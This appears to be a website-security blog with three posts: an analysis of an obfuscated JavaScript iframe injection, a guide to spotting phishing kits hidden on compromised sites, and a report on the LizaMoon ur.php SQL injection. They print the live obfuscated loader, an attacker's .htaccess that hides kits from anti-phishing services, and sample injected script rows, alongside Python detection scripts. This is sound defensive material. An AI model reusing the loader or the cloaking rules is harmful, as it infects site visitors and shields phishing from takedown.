WeWatchYourWebsite

"so you don't have to!"

The latest website infection

We’re seeing more and more obfuscated JavaScript infections recently.

The latest one:


y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';
fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';
u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat
(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var
ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute
('height','5');ov.setAttribute('style','display:none');ov.setAttribute
(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';
bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';
lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';
pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat
(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);
bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');
bo.setAttribute(kx,dv);document.body.appendChild(bo);

deobfuscates to:

iframe setAttribute src = hxxp://prw1.co.cc/forum.php?tp=74220a5e554afea7

and:

iframe setAttribute src = hxxp://pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4

Which are listed as suspicious by Google:

What is the current listing status for prw1.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 5 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-09, and the last time suspicious content was found on this site was on 2011-04-08.
Malicious software includes 440 scripting exploit(s).

and…

What is the current listing status for pzl3.co.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 4 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-04-27, and the last time suspicious content was found on this site was on 2011-04-27.
Malicious software includes 334 scripting exploit(s).

In gathering data and searching for the source of the vulnerability that leads to this infection (now on about 38,500 websites), we have found no common denominator among the infected websites.

It doesn’t appear to be WordPress or Joomla or osCommerce or any of the other popular website packages.

It might be more stolen FTP login credentials.

If you have further information on this, please post here, or email me at traef@wewatchyourwebsite.com.

Thank you.

Let’s go phishing

A fishing buddy of mine describes fishing as, “a jerk on one end of the line, waiting for a jerk on the other end”.

As we have been “beefing-up” our phishing detection, I started thinking about my friend’s comment. Couldn’t phishing be described the same way?

We talk with people every day whose websites have been infected by hackers, and quite often we hear, “What do these jerks want with my website?” So there is a jerk on one end of the line, waiting for a jerk (or unsuspecting person) on the other end.

Phishing, as you probably know, is the act of “fooling” someone into providing their Personally Identifiable Information (PII). In the early days of phishing, you would get an email that may have had all the correct graphics to make it look legitimate; however, there would typically be commonly misspelled words and other grammatical errors that would indicate that something was amiss.

Nowadays, the emails look legitimate, and so do the websites that the bogus emails link to.

You may see emails with subject lines like, “PayPal security alert”, or “Attempted change to your banking login”, in order to alarm you into action.

In this post, I’m going to educate you on what hackers do to websites to get them ready for phishing.

First, realize that when a website is compromised (hacked) by someone, they have many options:

  • They can inject a script that attempts to infect the computer of any of your visitors
  • They can store their games and other illegally obtained software on the site
  • They can add phishing files and use the compromised site to steal PII
  • Or, in worst case scenarios, they delete all the files to cover their tracks

For now, we’re going to focus on using compromised sites for phishing.

When the hackers turn their attention to phishing, they want to hide their “work” from prying eyes, yet still make it widely available to their potential victims.

How do you determine if your website is being used for phishing?

We typically find the phishing files deep inside a multi-level folder structure. It’s not unusual for us to find phishing files buried 10 sub-folders (directories) deep on a website. It’s so common that you could almost classify it as a characteristic of phishing files.

Hackers are so determined to keep their phishing files hidden that they even protect them. On numerous sites we’ve found that the hackers have used an .htaccess file to help keep their files hidden.

Some of the entries in such an .htaccess file are:

setenvifnocase Referer castlecops.com spammer=yes
setenvifnocase Referer internetidentity.com spammer=yes
setenvifnocase Referer phishfighting.com spammer=yes
setenvifnocase Referer phishtank.com spammer=yes
setenvifnocase Referer spamcop.net spammer=yes
setenvifnocase Referer spam spammer=yes
setenvifnocase Referer phish spammer=yes
setenvifnocase Referer bezeqint.net spammer=yes

Order Allow,Deny
Allow from all
Deny from env=spammer

Let me explain.

Castlecops.com, InternetIdentity.com, Phishfighting.com, Phishtank.com and Spamcop.net all scan the Internet looking for phishing pages. This .htaccess says that if the referer is one of these sites, then mark that traffic as spam (spammer=yes). The Order Allow,Deny section says to allow all traffic (Allow from all), but deny any visitor previously marked as a spammer (Deny from env=spammer).

Of course these sites are not spammers, but that’s how the hacker has labelled them, for their own protection. Also, the hackers believe that if someone, such as yourself, looks inside this file, you may just think it’s some security measure and leave it alone.

If you get an email from one of the above organizations, you may want to check your website files for phishing folders.

Some strings to search for are:

hsbcMainContent
HSBC Premier
By United 4U
online.lloydstsb.co.uk
Personal Banking Online Verification
Lloyds TSB FullZ By GhostRideR
internetbanking
$annualIncome
OnlineBankingRegistration
Northern Rock Online
Your mother’s maiden name
Your Security Number
Barclays Secure Form
Log in to Digital Banking
RBS Refund Form

There are many, many others but this should get you started.
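A scanner along these lines, added here as an example rather than a WeWatchYourWebsite tool: it walks a web root, flags files containing the strings above, flags .htaccess files that deny the anti-phishing referers listed earlier, and notes web files nested unusually deep. The depth threshold and the temporary web root it builds for the demo are constructed.

```python
import os
import re
import tempfile

# Indicator strings quoted in the post, and the anti-phishing referers the hostile .htaccess denies.
PHISH_STRINGS = ["hsbcMainContent", "Lloyds TSB FullZ", "Barclays Secure Form",
                 "RBS Refund Form", "Your mother’s maiden name", "$annualIncome"]
HOSTILE_HTACCESS = re.compile(
    r"setenvifnocase\s+Referer\s+\S*(phishtank|castlecops|phishfighting|internetidentity|spamcop|phish|spam)",
    re.I)
DEPTH_ALERT = 6  # constructed threshold; the post sees kits buried 10 folders deep

def scan_webroot(root):
    """Walk a web root and return sorted (finding, relative path, folder depth) tuples."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            depth = rel.count(os.sep)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name == ".htaccess" and HOSTILE_HTACCESS.search(text):
                findings.append(("htaccess-denies-antiphishing-referers", rel, depth))
            hits = [s for s in PHISH_STRINGS if s in text]
            if hits:
                findings.append(("phishing-string:" + hits[0], rel, depth))
            if depth >= DEPTH_ALERT and name.lower().endswith((".php", ".html", ".htm")):
                findings.append(("deeply-nested-web-file", rel, depth))
    return sorted(findings)

def _write(path, text):
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)

def demo():
    """Constructed web root: one clean page plus a kit buried seven folders deep."""
    with tempfile.TemporaryDirectory() as root:
        deep = os.path.join(root, "images", "cache", "tmp", "a", "b", "c", "hsbc")
        os.makedirs(deep)
        _write(os.path.join(root, "index.html"), "<html><body>Welcome to our shop</body></html>")
        _write(os.path.join(deep, ".htaccess"), "setenvifnocase Referer phishtank.com spammer=yes\n"
               "Order Allow,Deny\nAllow from all\nDeny from env=spammer\n")
        _write(os.path.join(deep, "login.php"), '<div id="hsbcMainContent">Your Security Number</div>')
        return scan_webroot(root)
```

Point scan_webroot at a real document root to run it; a clean tree returns an empty list.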

If you have any questions about phishing, or identifying phishing files on your website, please email me at traef@wewatchyourwebsite.com.

If you have any information about phishing that you’d like to share, please leave a comment.

The Lizamoon Website Infection

Websense reported here on a new infection that’s hit thousands of websites.

This infection is referred to as LizaMoon because that is the first, and most popular domain seen in this infection. I think, instead of lizamoon, it could be referred to as the “ur.php” infection, but that’s just my opinion.

You can tell if your website has this if any of your pages, when viewed through a browser, have code inserted that looks like:

lizamoon sql injection

Some common traits that are interesting to note are:

1. The script tags appear as the &lt; and &gt; entity codes rather than the literal “<” and “>” characters
2. The inserted code appears in the title tag
3. The inserted code appears in many drop-down listings
4. The infection appears to be only in .asp, .aspx and .cfm web pages

Many of these traits point to an apparent SQL injection, given where the inserted code sits in the rendered webpage. Websense commented on their blog that this might be traced to a vulnerability in Microsoft’s SQL 2003 and 2005. We don’t doubt their findings, but we could not confirm that ourselves; however, seeing that the infected sites are based on either ASP(X) or ColdFusion, it does lead us to believe this.

Other domains used in this infection:
…and many others; the list will definitely be changing as this moves forward.

Many of the sites used as redirections in this infection are the fake anti-virus based websites where they (the hackers) try to trick the visitor into believing their PC is infected.

At the time we investigated this, we found that the fake anti-virus software these sites attempt to install on a visitor’s PC is known as “Windows Stability Center”. Currently this is only detected by 13 out of 43 different anti-virus programs, so its effectiveness could be quite high.

To check your website, you could either perform SQL queries or export your database and do a text search for the string “ur.php”, as that file seems to be associated with all the domains used in this infection.
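As an added example (not from the post), a Python check over a database export that finds rows carrying the ur.php script, decoding HTML entities first so both raw and &lt;-encoded storage are caught, and reports the affected table and the injected domain. The dump excerpt is constructed; the domains in it are the post’s own examples.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed excerpt of a database export in the shape the post describes: the script
# tag is stored as text inside existing columns (titles, drop-down labels), sometimes
# raw and sometimes already entity-encoded.
DUMP = """INSERT INTO products (id, title) VALUES (1, 'Blue widget');
INSERT INTO products (id, title) VALUES (2, 'Red widget</title><script src=http://lizamoon.com/ur.php></script>');
INSERT INTO categories (id, label) VALUES (7, 'Gifts<script src=http://alisa-carter.com/ur.php></script>');
INSERT INTO pages (id, title) VALUES (3, 'Home&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;');
INSERT INTO categories (id, label) VALUES (8, 'Books');"""

TABLE = re.compile(r"INSERT\s+INTO\s+`?(\w+)`?", re.I)
UR_PHP = re.compile(r"<script\s+src=['\"]?(https?://[^'\"\s>]+/ur\.php)", re.I)

def find_injections(dump):
    """Return sorted (table, injected domain) pairs for rows carrying the ur.php script.
    Each statement is entity-decoded first so raw and &lt;-encoded storage both match."""
    found = set()
    for stmt in dump.splitlines():
        t = TABLE.match(stmt)
        if not t:
            continue
        for url in UR_PHP.findall(html.unescape(stmt)):
            found.add((t[1], urlsplit(url).hostname))
    return sorted(found)

if __name__ == "__main__":
    for table, domain in find_injections(DUMP):
        print(f"{table}: {domain}")
```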

Whether you want to call this the Lizamoon infection or use my suggestion of the “ur.php” infection, it’s infecting thousands of websites. As of this writing a Google search on the above script string shows 531,000 results.

Please comment on what you think about this. Have you been infected by this? Anyone have further insight?